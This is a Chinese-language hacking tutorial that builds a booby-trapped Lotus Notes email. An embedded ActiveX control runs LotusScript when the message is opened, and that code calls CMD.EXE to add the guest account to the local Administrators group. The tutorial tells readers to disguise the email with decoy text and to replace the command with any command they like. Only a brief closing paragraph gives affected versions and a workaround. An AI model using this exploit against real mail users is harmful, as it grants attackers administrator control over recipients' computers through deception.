Lotus是IBM公司开发的一套邮件系统,做为优秀的内部邮件系统,在中国应用极为广泛,如中国IBM公司,联想公司等都将其作为办公OA使用。但就是这套系统却存在严重的漏洞,可以通过构造一个特殊的邮件,获得任何打开该邮件的计算机系统的管理权限。
接下来我们来构造这种特殊的邮件,首先在lotus notes客户端新建邮件,选择收件人后,点击菜单“创建”项下的“对象”,在接下来弹出的对话框中选择“创建新的控件”和任意对象如“DiskManagement.Control
在随后打开的控件中,获得属性,然后点击“当读取文档时启动对象”复选框。
接着选择菜单“小程序”项下的“编辑事件”,在随后打开的对话框中的“Initialize”段中增加如下代码,这里的“MY EMAIL”是接受人的Lotus Notes帐户名字。
在下面的框中写入如下代码:
Sub Initialize
Dim session As New NotesSession
If session.CommonUserName="My EMAIL" Then
TaskId%=Shell("CMD.EXE /C net localgroup Administrators guest /add ",1)
‘将guest加入管理员组
End If
End Sub
同样在“Terminate”段增加如下代码:
Sub Terminate
Dim session As New NotesSession
If session.CommonUserName="My EMAIL" Then
TaskId%=Shell("CMD.EXE /C net localgroup Administrators guest /add ",1)
‘将guest加入管理员组
End Sub
为了不引起收件者的疑惑,在信件内容中加入一些文字做伪装更好,然后将邮件构造完成后发送出去,收件人在读文档的时候,ActiveX就会执行,你还可发挥想象力将以下这段代码改为任意的命令行语句:
“TaskId%=Shell("CMD.EXE /C net localgroup Administrators guest /add",1)”
此漏洞影响lotus4.6、lotus5等版本,并且没有好的解决方法,临时解决的方法是修改MAILBOX数据库属性,关闭“在文档中存储”功能,并保证Execution Control List (ECL) 措施正确配置。
漏洞利用邮件系统内置的功能自动执行任意代码,与现在流行的IE浏览时执行恶意代码有些相似。只要大家平时多留意,会发现有许多内部邮件系统都存在这一问题,这也反映了厂家在设计中过于信任内部局域网的安全性,希望这样的情况得以较好得解决。
:"Lotus notes也玩黑客入侵"
:"Lotus notes也玩黑客入侵"